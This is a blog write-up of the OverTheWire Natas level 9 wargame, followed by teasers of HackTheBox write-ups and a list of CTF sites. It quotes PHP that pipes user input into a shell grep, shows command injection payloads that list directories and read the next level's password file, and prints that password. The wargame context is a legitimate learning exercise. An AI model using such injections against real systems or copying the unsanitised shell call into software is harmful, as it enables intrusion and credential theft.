Over the wire Natas Level 9

Over the wire Natas Level 9

Objective:

Get password for Level 10

Solution:

So here we see a input box and a search button

If we put in anything it searches a dictionary.txt file for the input and displays the output

Let’s check out the source code for anything interesting.

<pre>

$key = "";

if(array_key_exists("needle", $_REQUEST)) {

$key = $_REQUEST["needle"];

}

if($key != "") {

passthru("grep -i $key dictionary.txt");

}

</pre>

Ok so it literally just greps the file for the keyword entered, the only check it does is to see if the key is empty

I bet we can pipe the input field to get it to return data

Let try an ls to see if we can pass directly to the shell like we think

dog & ls ../

Output:

dictionary.txt

../:

main

natas0

natas1

natas10

natas11

natas12

natas13

natas14

natas15

natas16

natas17

natas18

natas19

natas2

natas20

natas21

natas21-experimenter

natas22

natas23

natas24

natas25

natas26

natas27

natas28

natas29

natas3

natas30

natas31

natas32

natas33

natas33-new

natas34

natas4

natas5

natas6

natas7

natas8

natas9

stats

OK so it did LS the parent directory like we thought

We know from an earlier exercise the keys are stored in the /etc/natas_webpass/ folder

Let’s see if we can cat the file for natas10

& cat /etc/natas_webpass/natas10

Output:

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

African

Africans

Allah

Allah's

American

Americanism

Americanism's

Americanisms

Americans

April

April's

Aprils

And there is the password

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Comments

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) | 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open http Node.js (Express middlewar...

Hack The Box - Retired - Laboratory

HackTheBox - Laboratory - Retired Starting off with a quick scan using threader6000 /opt/threader3000/threader6000.py 10.10.10.216 Ports 22,80,443 came back. Run nmap against these ports. nmap -p22,80,443 -sV -sC -T4 -Pn -oN 10.10.10.216 10.10.10.216 nmap -p22,80,443 -sV -sC -Pn -T4 -oN 10.10.10.216 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 17:43 EDT Nmap scan report for laboratory.htb (10.10.10.216) Host is up (0.060s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA) | 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA) |_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519) 80/tcp open http Apache httpd 2.4.41 |_...

A collection of online Security CTF and Learning sites

Hellbound Hackers Embedded Security CTF Arizona Cyber Warfare Range Over The Wire - Bandit Pico CTF 2018 Hack The Box.eu Root Me: Challenges/Forensic RingZero CTF Vulnerable By Design - Vulnerable VMs Murder Mystery SQL Challenge Incident Response Challenge Authentication Lab Walkthroughs Defcon CTF Archives Matrix Holiday Hack Cyber Defenders | Blue Team and CTF Crypto Hack - learning Crypto Video Learning Zero to Hero Pentesting by The Cyber Mentor

circusmonkey404's Security Site

Search This Blog